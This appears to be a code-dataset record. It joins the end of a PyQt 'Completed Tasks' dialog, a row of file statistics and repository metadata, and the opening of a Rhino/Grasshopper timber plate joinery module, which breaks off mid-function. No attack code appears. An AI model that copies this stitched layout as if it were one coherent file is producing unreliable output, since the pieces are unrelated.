        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(36, 34, 41))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(72, 68, 82))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
        self.list1.setPalette(palette)
        self.list1.setObjectName("list1")
        self.gridLayout.addWidget(self.list1, 0, 0, 1, 1)
        # Ok / Cancel button box below the list.
        self.buttonBox = QtWidgets.QDialogButtonBox(completed)
        palette = QtGui.QPalette()
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(36, 34, 41))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
        self.buttonBox.setPalette(palette)
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonBox.setCenterButtons(True)
        self.buttonBox.setObjectName("buttonBox")
        self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
        # Populate the list from the database before showing the dialog.
        self.display()
        self.retranslateUi(completed)
        # Wire Ok/Cancel to the dialog's accept/reject slots.
        self.buttonBox.accepted.connect(completed.accept)
        self.buttonBox.rejected.connect(completed.reject)
        QtCore.QMetaObject.connectSlotsByName(completed)

    def display(self):
        """Fill the list widget with rows from the ``tasksdone`` table.

        Rows are shown newest-first (the fetched list is reversed).
        NOTE(review): the sqlite3 connection is never closed - consider
        closing it after reading.
        """
        MyDisplay = sqlite3.connect('tasks.db')
        cusd = MyDisplay.cursor()
        cusd.execute("SELECT * from tasksdone")
        record = cusd.fetchall()
        record.reverse()
        # Only the first column of each row (the task text) is displayed.
        for rec in record:
            self.list1.addItem(rec[0])

    def retranslateUi(self, completed):
        """Apply translatable strings (the window title) to the dialog."""
        _translate = QtCore.QCoreApplication.translate
        completed.setWindowTitle(_translate("completed", "Completed Tasks"))
if __name__ == "__main__":
    import sys

    # Stand-alone launch: create the dialog, attach the generated UI and
    # hand control to the Qt event loop.
    app = QtWidgets.QApplication(sys.argv)
    dialog = QtWidgets.QDialog()
    ui = Ui_completed()
    ui.setupUi(dialog)
    dialog.show()
    sys.exit(app.exec_())
| 53.033058 | 106 | 0.691055 | 1,498 | 12,834 | 5.911215 | 0.100134 | 0.171767 | 0.102993 | 0.135178 | 0.829249 | 0.829249 | 0.829249 | 0.829249 | 0.829249 | 0.823715 | 0 | 0.041403 | 0.187003 | 12,834 | 241 | 107 | 53.253112 | 0.807265 | 0.015739 | 0 | 0.59276 | 1 | 0 | 0.007606 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013575 | false | 0 | 0.013575 | 0 | 0.031674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
590689adc0981701acb939d484ca294e6172f5b7 | 520,254 | py | Python | platesjoinery.py | ibois-epfl/Manis-timber-plate-joinery-solver | fecdb1dfe23348de261f034f85baf24ac396e8cc | [
"MIT"
] | 3 | 2021-10-19T11:55:59.000Z | 2022-02-04T15:29:04.000Z | platesjoinery.py | ibois-epfl/Manis-timber-plate-joinery-solver | fecdb1dfe23348de261f034f85baf24ac396e8cc | [
"MIT"
] | null | null | null | platesjoinery.py | ibois-epfl/Manis-timber-plate-joinery-solver | fecdb1dfe23348de261f034f85baf24ac396e8cc | [
"MIT"
] | null | null | null | """
Module for Timber Plate Joinery from Digital Fabrication to Robotic Assembly
Classes:
- PlateModel : adjacency, topology, insertion vectors, assembly sequence...
- Module : inherits from model, sub-sequence, insertion vectors...
- Plate : thickness, contour, plane, normal...
- Toolbox : geometry functions for Rhino objects
"""
# Module authorship and provenance metadata.
__author__ = "Nicolas Rogeau"
__laboratory__ = "IBOIS, Laboratory for Timber Construction"
__university__ = "EPFL, Ecole Polytechnique Federale de Lausanne"
__funding__ = "NCCR Digital Fabrication, ETH Zurich"
__version__ = "2021.10.18"
import rhinoscriptsyntax as rs
import Rhino.Geometry as rg
from ghpythonlib import components as gh
from Grasshopper import DataTree
from Grasshopper.Kernel.Data import GH_Path
import scriptcontext
import math
import copy
import ast
#Model -----------------------------------------------------------------------
class PlateModel:
def __init__(self, breps, sequence=0, constraints=[None,None,None,None,None], discard=[]):
    """Build the plate model: topology detection, then assembly solving.

    breps       : list of closed solids (one per plate).
    sequence    : assembly sequence as a string of nested lists
                  (e.g. '[[0,1],2]'); 0/None/[] selects the default order.
    constraints : custom insertion spaces for the five contact categories
                  (FF, FS/SF, ES/SE, SS, IN); a 5-branch DataTree is
                  expected by __get_contact_spheres.
    discard     : '(i,j)' pair strings whose contact must be ignored.

    NOTE(review): mutable default arguments (lists) are shared between
    calls; safe only as long as no caller mutates them — confirm.
    The initialization order below is strict: sequence must be set before
    breps are reordered, and topology before assembly.
    """
    # INITIALIZATION -------------------------------------
    self.temp = []  # scratch storage (e.g. failed insertion spaces)
    self.log = []   # human-readable construction trace
    self.count = len(breps)
    self.sequence = self.__set_sequence(sequence)
    self.breps = self.__reorder_breps(breps)
    self.sequence = self.__reorder_sequence(self.sequence)
    self.plates = self.__get_plates_from_breps()
    # TOPOLOGY -------------------------------------------
    self.discard = discard
    self.contact_ids = self.__get_contact_ids()
    self.contact_pairs = self.__get_contact_pairs()
    self.contact_breps = self.__get_contact_breps()
    self.contact_zones= self.__get_contact_zones()
    self.contact_types = self.__get_contact_types()
    self.contact_strings = self.__get_contact_strings()
    self.contact_centers= self.__get_contact_centers()
    self.contact_normals = self.__get_contact_normals()
    self.contact_planes= self.__get_contact_planes()
    self.contact_spheres = self.__get_contact_spheres(constraints)
    # ASSEMBLY -------------------------------------------
    self.contact_vectors = []
    self.modules = self.__get_modules_from_sequence()
    self.assembly_vectors = []
    self.assembly_spaces = []
    self.assembly_relatives = []
    self.__get_assembly_vectors()
    # STRUCTURAL ANALYSIS --------------------------------
    self.FEM_joints = []
    self.FEM_plates = [plate.mid_contour for plate in self.plates]
# MODEL INITIALIZATION ---------------------------------------
def __set_sequence(self, sequence):
"""return the default sequence if incorrect input is provided"""
if sequence == 0 or sequence == [] or sequence == None:
self.log.append('Sequence set to default : '+ str(range(self.count)))
return str(range(self.count))
else:
if type(sequence) is str:
Toolbox.Data.test_seq(sequence)
try: test = ast.literal_eval(sequence)
except: raise Exception(' An error occured when trying to convert sequence text to list of lists.')
self.log.append('Sequence set to custom : '+ str(sequence))
return sequence
else: raise Exception(' Sequence input should be expressed as a string.')
def __reorder_breps(self, breps):
    """Sort the breps so they follow the flattened assembly sequence."""
    order = Toolbox.Data.flatten_integer_list(ast.literal_eval(self.sequence))
    return Toolbox.Data.sort_list_sync(breps, order)
def __reorder_sequence(self, sequence):
    """Normalize the sequence ordering, logging only when it changed."""
    reordered = Toolbox.Data.reorder_sequence(sequence)
    if reordered != sequence:
        self.log.append('Breps and sequence have been reordered: ' + str(reordered))
    return reordered
def __get_plates_from_breps(self):
    """Wrap every brep in a Plate object carrying its model index."""
    return [Plate(brep, index) for index, brep in enumerate(self.breps)]
def __get_modules_from_sequence(self):
    """Create the PlateModule hierarchy implied by the nested sequence.

    Every non-leaf node of the nested sequence becomes a sub-module; a
    final module labelled ['Model'] wraps the whole sequence. Each module
    records its parent path and the paths of its direct children.
    """
    # create sub_sequence list: every step path that is not a leaf
    # (deepest step) corresponds to a sub-module.
    seq = ast.literal_eval(self.sequence)
    steps = Toolbox.Data.seq_to_steps(seq)
    steps = Toolbox.Data.order_sequence(steps)
    sub_seq = []
    sub_steps = []
    for i in range(len(steps)):
        if steps[i] in Toolbox.Data.deepest_steps(seq): pass
        else:
            sub_steps.append(steps[i])
            sub_seq.append(Toolbox.Data.get_item_from_path(seq, steps[i]))
    # the full sequence itself is appended last as the root module.
    sub_seq.append(seq)
    sub_steps.append(['Model'])
    # fill parent list: root has no parent; depth-1 modules belong to
    # 'Model'; deeper modules point at their enclosing path.
    parents = []
    for sub_step in sub_steps:
        if sub_step == ['Model']: parents.append([])
        elif len(sub_step) == 1 : parents.append(['Model'])
        else: parents.append(sub_step[0:len(sub_step)-1])
    # fill children list by matching each parent path against all paths.
    children = Toolbox.Data.list_of_empty_lists(len(parents))
    for i in range(len(parents)):
        for j in range(len(sub_steps)):
            if parents[i] == sub_steps[j]:
                children[j].append(sub_steps[i])
    # module creation (sequence is re-serialized to a string per module).
    modules = []
    for i in range(len(sub_seq)):
        modules.append(PlateModule(self, i, sub_steps[i], str(sub_seq[i]), parents[i], children[i]))
    return modules
# MODEL TOPOLOGY ---------------------------------------------
def __get_contact_ids(self):
    """Detect plate adjacency: for each plate, the indices of touching plates.

    Two plates are adjacent when their breps intersect in a single closed
    planar curve (face/side contact), or when their contours mutually
    intersect the other plate's faces (true volume intersection).
    Pairs listed in self.discard are skipped and logged.
    """
    mylist = []
    for i in range(self.count):
        sub = []
        for j in range(self.count):
            if i != j:
                #discard: accept '(i,j)' given as a single string or inside a list, in either order
                if ('('+str(i)+','+str(j)+')' == self.discard) or ('('+str(i)+','+str(j)+')' in self.discard) or ('('+str(j)+','+str(i)+')' == self.discard) or ('('+str(j)+','+str(i)+')' in self.discard):
                    self.log.append("pair "+str(i)+","+str(j)+" skipped")
                else:
                    intersect = rs.IntersectBreps(self.breps[i],self.breps[j])
                    if intersect != None:
                        if len(intersect) == 1:
                            # single closed planar intersection curve -> surface contact
                            if rs.IsCurveClosed(intersect) is True:
                                if rs.IsCurvePlanar(intersect) is True:
                                    sub.append(j)
                        else:
                            # if plate contours are intersecting the surfaces of the other plate
                            # (all four contour/face tests must pass -> intersecting volumes)
                            if rs.CurveBrepIntersect(self.plates[i].top_contour,self.plates[j].top_face) != None:
                                if rs.CurveBrepIntersect(self.plates[i].top_contour,self.plates[j].bottom_face) != None:
                                    if rs.CurveBrepIntersect(self.plates[i].bottom_contour,self.plates[j].top_face) != None:
                                        if rs.CurveBrepIntersect(self.plates[i].bottom_contour,self.plates[j].bottom_face) != None:
                                            sub.append(j)
        mylist.append(sub)
    return mylist
def __get_contact_pairs(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
brep_id = self.contact_ids[i][j]
sub.append( '(' + str(i) + ',' + str(brep_id) + ')' )
mylist.append(sub)
return mylist
def __get_contact_breps(self):
    """Return, per plate, a geometry copy of each neighbouring brep."""
    copies = []
    for i in range(self.count):
        row = []
        for neighbour in self.contact_ids[i]:
            row.append(rs.coercebrep(rs.CopyObject(self.breps[neighbour])))
        copies.append(row)
    return copies
def __get_contact_zones(self):
    """Build one planar contact surface per adjacent pair.

    Surface-contact pairs reuse the closed planar intersection curve.
    Intersecting-volume pairs reconstruct a mid-plane quad from the four
    boolean-intersection edges parallel to the plates' common direction,
    then orient the surface normal away from plate i.
    """
    mylist = []
    for i in range(self.count):
        sub = []
        for j in range(len(self.contact_ids[i])):
            brep_id = self.contact_ids[i][j]
            # deep copies so the booleans below never mutate the model plates
            pi = copy.deepcopy(self.plates[i])
            pj = copy.deepcopy(self.plates[brep_id])
            intersect = rs.IntersectBreps(pi.brep,pj.brep)
            if intersect != None:
                if len(intersect) == 1:
                    if rs.IsCurveClosed(intersect) is True:
                        if rs.IsCurvePlanar(intersect) is True:
                            zone = rs.coercegeometry(rs.AddPlanarSrf(intersect)[0])
                            sub.append(zone)
                # intersecting breps
                else:
                    # if plate contours are intersecting the surfaces of the other plate
                    if rs.CurveBrepIntersect(pi.top_contour, pj.top_face) != None:
                        if rs.CurveBrepIntersect(pi.top_contour, pj.bottom_face) != None:
                            if rs.CurveBrepIntersect(pi.bottom_contour, pj.top_face) != None:
                                if rs.CurveBrepIntersect(pi.bottom_contour, pj.bottom_face) != None:
                                    volume = rg.Brep.CreateBooleanIntersection(pi.brep,pj.brep,0.1)[0]
                                    edges = Toolbox.Breps.brep_edges(volume)
                                    # longest edges first, keep the 4 parallel to the common direction
                                    edges.sort(key=rs.CurveLength)
                                    edges.reverse()
                                    vec_dir = Toolbox.Vectors.round_vector(rs.VectorUnitize(Toolbox.Vectors.cross(pi.top_normal, pj.top_normal)),6)
                                    four_edges = []
                                    for edge in edges:
                                        vec_line = Toolbox.Vectors.round_vector(rs.VectorUnitize(Toolbox.Vectors.line_to_vec(edge)),6)
                                        if vec_dir == vec_line or vec_dir == rs.VectorReverse(vec_line):
                                            four_edges.append(edge)
                                        if len(four_edges) == 4: break
                                    # quad through the four edge points closest to their common center
                                    mids = [rs.CurveMidPoint(four_edges[k]) for k in range(4)]
                                    center = Toolbox.Points.average_point(mids)
                                    proj = rs.coerce3dpointlist([rs.EvaluateCurve(four_edges[l],rs.CurveClosestPoint(four_edges[l],center)) for l in range(4)])
                                    poly = rs.AddPolyline(rs.PolylineVertices(gh.ConvexHull(proj, rs.PlaneFitFromPoints(proj))[0]))
                                    zone = rs.coercegeometry(rs.AddPlanarSrf(poly)[0])
                                    #orient surface normal
                                    current_normal = rs.SurfaceNormal(zone,[0,0])
                                    new_vec = Toolbox.Vectors.line_to_vec(four_edges[0],True)
                                    test_point = rs.CurveStartPoint(four_edges[0])
                                    test1 = rs.IsPointOnCurve(pi.top_contour, test_point)
                                    test2 = rs.IsPointOnCurve(pi.bottom_contour, test_point)
                                    if test1 is True or test2 is True:
                                        new_vec =rs.VectorReverse(new_vec)
                                    if rs.IsVectorParallelTo(current_normal, new_vec) == -1:
                                        rs.FlipSurface(zone,True)
                                    sub.append(zone)
        mylist.append(sub)
    return mylist
def __get_contact_types(self):
    """Classify every contact pair by comparing zone and plate normals.

    Codes (first letter = plate i, second = neighbour): SS side-side,
    IN intersecting volumes, FF face-face, FS/SF face-side, ES/SE
    edge-side. A null cross product means the zone normal is parallel
    to that plate's top normal (i.e. the contact lies on a face).
    """
    mylist = []
    for i in range(self.count):
        sub = []
        for j in range(len(self.contact_ids[i])):
            nb = self.contact_ids[i][j]
            zone = self.contact_zones[i][j]
            zone_normal = rs.SurfaceNormal(zone,[0,0])
            plate1_normal = self.plates[i].top_normal
            plate2_normal = self.plates[nb].top_normal
            cross1 = Toolbox.Vectors.cross(zone_normal,plate1_normal)
            cross2 = Toolbox.Vectors.cross(zone_normal,plate2_normal)
            # neither plate face is parallel to the zone -> sides or volumes
            if Toolbox.Vectors.isvectornull(cross1) is False and Toolbox.Vectors.isvectornull(cross2) is False :
                intersect = rs.IntersectBreps(self.breps[i],self.breps[nb])
                if rs.IsCurvePlanar(intersect) is True: sub.append('SS')
                else: sub.append('IN')
            # both faces parallel to the zone -> face-to-face
            elif Toolbox.Vectors.isvectornull(cross1) is True and Toolbox.Vectors.isvectornull(cross2) is True :
                sub.append('FF')
            else:
                #edge test: a shared contour edge distinguishes edge contact from face contact
                top_top = Toolbox.Curves.isSharingEdge(self.plates[i].top_contour, self.plates[nb].top_contour)
                top_bottom = Toolbox.Curves.isSharingEdge(self.plates[i].top_contour, self.plates[nb].bottom_contour)
                bottom_top = Toolbox.Curves.isSharingEdge(self.plates[i].bottom_contour, self.plates[nb].top_contour)
                bottom_bottom = Toolbox.Curves.isSharingEdge(self.plates[i].bottom_contour, self.plates[nb].bottom_contour)
                if Toolbox.Vectors.isvectornull(cross1) is True and Toolbox.Vectors.isvectornull(cross2) is False :
                    if top_top == False and top_bottom == False and bottom_top == False and bottom_bottom == False:
                        sub.append('FS')
                    else: sub.append('ES')
                elif Toolbox.Vectors.isvectornull(cross1) is False and Toolbox.Vectors.isvectornull(cross2) is True :
                    if top_top == False and top_bottom == False and bottom_top == False and bottom_bottom == False:
                        sub.append('SF')
                    else: sub.append('SE')
        mylist.append(sub)
    return mylist
def __get_contact_strings(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
brep_id = self.contact_ids[i][j]
ptype = self.contact_types[i][j]
if ptype == 'SS':
sub.append('Side of plate '+str(i)+' is connected to Side of plate '+str(brep_id))
elif ptype == 'FS':
sub.append('Face of plate '+str(i)+' is connected to Side of plate '+str(brep_id))
elif ptype == 'ES':
sub.append('Edge of plate '+str(i)+' is connected to Side of plate '+str(brep_id))
elif ptype == 'SF':
sub.append('Side of plate '+str(i)+' is connected to Face of plate '+str(brep_id))
elif ptype == 'SE':
sub.append('Side of plate '+str(i)+' is connected to Edge of plate '+str(brep_id))
elif ptype == 'FF':
sub.append('Face of plate '+str(i)+' is connected to Face of plate '+str(brep_id))
elif ptype == 'IN':
sub.append('Volume of plate '+str(i)+' is intersecting volume of plate '+str(brep_id))
mylist.append(sub)
return mylist
def __get_contact_centers(self):
    """Centroid of every contact zone, as a Rhino 3d point."""
    centers = []
    for i in range(self.count):
        row = [rs.coerce3dpoint(Toolbox.Surfaces.surface_centroid(self.contact_zones[i][j]))
               for j in range(len(self.contact_ids[i]))]
        centers.append(row)
    return centers
def __get_contact_normals(self):
    """Unit normal of every contact zone, pointing away from plate i.

    For all contact types except 'IN' the surface normal is flipped when
    it points towards the plate's own center, so the stored normal is
    always outward with respect to plate i.
    """
    mylist = []
    for i in range(self.count):
        sub = []
        for j in range(len(self.contact_ids[i])):
            brep_id = self.contact_ids[i][j]  # NOTE(review): unused here
            zone = self.contact_zones[i][j]
            vec = rs.VectorUnitize(rs.SurfaceNormal(zone,[0,0]))
            plate_center = self.plates[i].plate_center
            zone_center = Toolbox.Surfaces.surface_centroid(zone)
            # 'IN' zones were already oriented in __get_contact_zones
            if self.contact_types[i][j] != "IN":
                if Toolbox.Vectors.is_vector_outward(plate_center, zone_center, copy.deepcopy(vec)) is False:
                    vec=rs.VectorReverse(copy.deepcopy(vec))
            sub.append(rs.coerce3dvector(vec))
        mylist.append(sub)
    return mylist
def __get_contact_planes(self):
    """Reference plane per contact: origin at the zone center, Z along the
    contact normal, X along the zone's longest edge.

    For edge contacts (ES/SE) the X axis may be reversed so that the
    plane's Y axis points consistently relative to the edge plate's
    mid-plane (outward for ES, inward for SE).
    """
    mylist = []
    for i in range(self.count):
        sub = []
        for j in range(len(self.contact_ids[i])):
            nb = self.contact_ids[i][j]
            origin = self.contact_centers[i][j]
            zone = Toolbox.Surfaces.get_face_largest_contour(self.contact_zones[i][j])
            sides = rs.ExplodeCurves(rs.CopyObject(zone))
            longest_side = Toolbox.Curves.sort_curves_by_length(sides)[-1][0]
            x_axis = rs.VectorCreate(rs.CurveStartPoint(longest_side), rs.CurveEndPoint(longest_side))
            plane = rs.PlaneFromNormal(origin, self.contact_normals[i][j], x_axis)
            if self.contact_types[i][j] == 'ES':
                if Toolbox.Vectors.is_vector_outward(self.plates[i].mid_plane.Origin, self.contact_centers[i][j], plane.YAxis) is False:
                    plane = rs.PlaneFromNormal(origin, self.contact_normals[i][j], -x_axis)
            if self.contact_types[i][j] == 'SE':
                if Toolbox.Vectors.is_vector_outward(self.plates[nb].mid_plane.Origin, self.contact_centers[i][j], plane.YAxis) is True:
                    plane = rs.PlaneFromNormal(origin, self.contact_normals[i][j], -x_axis)
            sub.append(rs.coerceplane(plane))
        mylist.append(sub)
    return mylist
def __get_contact_spheres(self, constraints):
    """Build the insertion space of every contact.

    Each contact gets a piece of the unit sphere describing the feasible
    insertion directions: a hemisphere (FF, ES/SE), a half circle (FS/SF,
    SS) or a single point (IN). User constraints (a 5-branch DataTree,
    one branch per contact category) override the defaults. The canonical
    shape is then oriented onto the contact plane, with two special
    cases: FS/SF defaults are oriented with the male plate's plane, and
    ES/SE defaults are trimmed by the edge plate's mid-plane.
    """
    # No valid 5-branch tree -> empty constraints, i.e. all defaults.
    if constraints.BranchCount != 5: constraints = [[],[],[],[],[]]
    else: constraints = Toolbox.Data.datatree_to_list(constraints)
    # Create canonic insertion space (built once at the world origin)
    sphere = rs.AddSphere((0,0,0),1)
    cutter = rs.AddPlanarSrf(rs.AddPolyline([(1,1,0),(1,-1,0),(-1,-1,0),(-1,1,0),(1,1,0)]))
    hemisphere = rs.SplitBrep(sphere,cutter)[1]
    hemicircle_horizontal = rs.RotateObject(rs.AddArc(rs.WorldZXPlane(),1,180),(0,0,0),-90,(0,1,0))
    hemicircle_vertical = rs.RotateObject(rs.AddArc(rs.WorldYZPlane(),1,180),(0,0,0),0,(1,0,0))
    normal_point= rs.AddPoint(0,0,1)
    # Orient hemisphere on each conctact zone
    mylist = []
    for i in range(self.count):
        sub = []
        for j in range(len(self.contact_types[i])):
            #face-to-face
            if self.contact_types[i][j] == 'FF':
                if constraints[0] != []:
                    insertion_space = constraints[0]
                else: insertion_space = hemisphere
            #face-to-side
            elif (self.contact_types[i][j] == 'FS' or self.contact_types[i][j] == 'SF'):
                if constraints[1] != []:
                    insertion_space = constraints[1]
                else: insertion_space = hemicircle_horizontal
            #edge-to-side
            elif (self.contact_types[i][j] == 'ES' or self.contact_types[i][j] == 'SE'):
                if constraints[2] != []:
                    insertion_space = constraints[2]
                else: insertion_space = hemisphere
            #side-to-side
            elif self.contact_types[i][j] == 'SS':
                if constraints[3] != []:
                    insertion_space = constraints[3]
                else: insertion_space = hemicircle_vertical
            #intersecting
            elif self.contact_types[i][j] == 'IN':
                if constraints[4] != []:
                    insertion_space = constraints[4]
                else: insertion_space = normal_point
            #Exception for SF/FS where the default constraint is oriented with the male plane
            if constraints[1] == [] and (self.contact_types[i][j] == 'FS' or self.contact_types[i][j] == 'SF'):
                nb = self.contact_ids[i][j]
                if self.contact_types[i][j] == 'SF': male_normal = self.plates[i].top_plane.ZAxis
                else: male_normal = self.plates[nb].top_plane.ZAxis
                pl_origin = self.contact_planes[i][j].Origin
                pl_X = self.contact_planes[i][j].XAxis
                pl_Z = rs.VectorCrossProduct(male_normal, pl_X)
                proj_plane = rs.PlaneFromNormal(pl_origin, pl_Z, pl_X)
                # flip the projection plane if its Z points into the plate
                test_point = rs.CopyObject(pl_origin, -self.contact_normals[i][j])
                if Toolbox.Vectors.is_vector_outward(test_point, pl_origin, pl_Z) is False:
                    proj_plane = rs.PlaneFromNormal(pl_origin, -pl_Z, -pl_X)
                matrix = rg.Transform.PlaneToPlane(rs.WorldXYPlane(), proj_plane)
                insertion_space = rs.TransformObject(insertion_space, matrix,True)
            #normal Orientation of all other insertion constraints
            else:
                matrix = rg.Transform.PlaneToPlane(rs.WorldXYPlane(), self.contact_planes[i][j])
                insertion_space = rs.TransformObject(insertion_space, matrix,True)
            #Exception for SE/ES where the default constraint is trimmed by plate planes
            if constraints[2] == [] and (self.contact_types[i][j] == 'ES' or self.contact_types[i][j] == 'SE'):
                test_point = rs.CopyObject(self.contact_centers[i][j], - self.contact_planes[i][j].YAxis)
                if self.contact_types[i][j] == 'SE':
                    trim_plane = self.plates[i].mid_plane
                else: trim_plane = self.plates[self.contact_ids[i][j]].mid_plane
                trim_plane = rs.MovePlane(trim_plane, self.contact_centers[i][j])
                if Toolbox.Vectors.is_vector_outward(test_point, self.contact_centers[i][j], trim_plane.ZAxis) is True:
                    trim_plane = rs.RotatePlane(trim_plane, 180, trim_plane.XAxis)
                insertion_space = rs.TrimBrep(insertion_space, trim_plane)
            sub.append(insertion_space)
        mylist.append(sub)
    return mylist
# MODULES ASSEMBLY -------------------------------------------
def __get_assembly_vectors(self):
    """Solve one insertion vector per element of every (sub-)sequence.

    Pass 1 (per module): for each element after the first, collect the
    insertion spaces of all its contacts with already-placed elements,
    intersect them and keep the average direction; elements with no
    contact (or an infeasible intersection) fall back to "gravity" and
    may require a support. Pass 2 maps those module-level vectors back
    onto every contact pair (reversed when seen from the later plate).
    Finally the model-level attributes are mirrored from a module.
    """
    adj = self.contact_ids
    seq = ast.literal_eval(self.sequence)
    steps = Toolbox.Data.seq_to_steps(seq)
    steps = Toolbox.Data.order_sequence(steps)
    sub_seq = []
    for i in range(len(steps)):
        if steps[i] in Toolbox.Data.deepest_steps(seq): pass
        else: sub_seq.append(Toolbox.Data.get_item_from_path(seq, steps[i]))
    sub_seq.append(seq)
    # Assembly vectors following modules list
    # (deep copies only reserve the nested shape; entries are overwritten)
    iv = copy.deepcopy(sub_seq)
    space = copy.deepcopy(sub_seq)
    rel = copy.deepcopy(sub_seq)
    for i in range(len(sub_seq)):
        for j in range(len(sub_seq[i])):
            # first element in subsequence
            if j == 0:
                iv[i][j] = "gravity"
                rel[i][j] = []
                space[i][j] = []
            else:
                # look for all connection between the plate (or a plate of the module) to insert and the plates in place
                rel_list = [] #
                is_list = [] #insertion spaces
                # element in subsequence is a module
                if type(sub_seq[i][j]) is list:
                    plates = Toolbox.Data.flatten_integer_list(sub_seq[i][j])
                    for plate in plates:
                        neighbours = adj[plate]
                        prequel = sub_seq[i][:j]
                        # find all corespondance between the neighbour group and the prequel group
                        for k in range(len(neighbours)):
                            for l in range(len(prequel)):
                                # element in prequel is a module
                                if type(prequel[l]) is list:
                                    # NOTE(review): this flattens prequel[l] in place,
                                    # mutating sub_seq for later iterations — confirm intended.
                                    prequel[l] = Toolbox.Data.flatten_integer_list(prequel[l])
                                    for m in range(len(prequel[l])):
                                        if prequel[l][m] == neighbours[k]:
                                            # move the insertion sphere to the origin before intersecting
                                            to_zero = rs.VectorCreate((0,0,0),self.contact_centers[plate][k])
                                            sphere = rs.CopyObject(self.contact_spheres[plate][k],to_zero)
                                            is_list.append(sphere)
                                            rel_list.append(neighbours[k])
                                # element in prequel is a plate
                                else:
                                    if prequel[l] == neighbours[k]:
                                        to_zero = rs.VectorCreate((0,0,0),self.contact_centers[plate][k])
                                        sphere = rs.CopyObject(self.contact_spheres[plate][k],to_zero)
                                        is_list.append(sphere)
                                        rel_list.append(neighbours[k])
                # element in subsequence is a plate
                else:
                    plate = sub_seq[i][j]
                    neighbours = adj[plate]
                    prequel = sub_seq[i][:j]
                    # find the first corespondance between the neighbour group and the prequel group
                    for k in range(len(neighbours)):
                        for l in range(len(prequel)):
                            # element in prequel is a module
                            if type(prequel[l]) is list:
                                for m in range(len(prequel[l])):
                                    if prequel[l][m] == neighbours[k]:
                                        to_zero = rs.VectorCreate((0,0,0),self.contact_centers[plate][k])
                                        sphere = rs.CopyObject(self.contact_spheres[plate][k],to_zero)
                                        is_list.append(sphere)
                                        rel_list.append(neighbours[k])
                            # element in prequel is a plate
                            else:
                                if prequel[l] == neighbours[k]:
                                    to_zero = rs.VectorCreate((0,0,0),self.contact_centers[plate][k])
                                    sphere = rs.CopyObject(self.contact_spheres[plate][k],to_zero)
                                    is_list.append(sphere)
                                    rel_list.append(neighbours[k])
                # If plate/module has no contact, add a default vector and a support
                if is_list == []:
                    iv[i][j] = "gravity"
                    space[i][j] = []
                    rel[i][j] = []
                    self.modules[i].needed_supports += 1
                # If plate/module has contacts, intersect insertion spheres and take average candidate
                else:
                    try:
                        inter = self.intersect_insertion_spaces(is_list)
                        iv[i][j] = inter[0] #average vector
                        space[i][j] = inter[1] #candidates
                        rel[i][j] = rel_list
                    except:
                        # infeasible intersection: keep the spaces for debugging
                        # and fall back to a gravity insertion
                        self.temp = is_list
                        iv[i][j] = "gravity"
                        space[i][j] = []
                        rel[i][j] = rel_list
                        #raise Exception('Insertion space intersection returns no compatible vector for plate(s) '+str(sub_seq[i][j])+' with plates '+str(rel[i][j]))
                # if average vector failed or was null, take gravity instead
                if iv[i][j] == None: iv[i][j] = "gravity"
    # Update modules attributes
    for i in range(len(self.modules)):
        self.modules[i].assembly_vectors = iv[i]
        self.modules[i].assembly_relatives = rel[i]
        self.modules[i].assembly_spaces = space[i]
    # Assembly vectors following contact list
    iv2 = copy.deepcopy(self.contact_planes)
    rel2 = copy.deepcopy(self.contact_planes)
    # Compare each contact zone...
    for i in range(self.count):
        for j in range(len(adj[i])):
            # ... with each module sequence.
            search = True
            for k in range(len(self.modules)):
                # to retrieve the associated assembly vector
                if search is True:
                    mod_seq = ast.literal_eval(self.modules[k].sequence)
                    plates_in_sequence = Toolbox.Data.flatten_integer_list(mod_seq)
                    if (i in plates_in_sequence) and (adj[i][j] in plates_in_sequence):
                        for l in range(len(mod_seq)):
                            corresponding_vector = copy.deepcopy(self.modules[k].assembly_vectors[l])
                            if type(mod_seq[l]) is list:
                                plates_in_sub_sequence = Toolbox.Data.flatten_integer_list(mod_seq[l])
                                # the vector is reversed when read from the plate inserted later
                                if i < adj[i][j] and adj[i][j] in plates_in_sub_sequence:
                                    iv2[i][j] = corresponding_vector
                                    rel2[i][j] = adj[i][j]
                                    search = False
                                elif i > adj[i][j] and i in plates_in_sub_sequence:
                                    iv2[i][j] = rs.VectorReverse(corresponding_vector)
                                    rel2[i][j] = adj[i][j]
                                    search = False
                            else:
                                if i < adj[i][j] and mod_seq[l] == adj[i][j]:
                                    iv2[i][j] = corresponding_vector
                                    rel2[i][j] = adj[i][j]
                                    search = False
                                elif i > adj[i][j] and mod_seq[l] == i:
                                    iv2[i][j] = rs.VectorReverse(corresponding_vector)
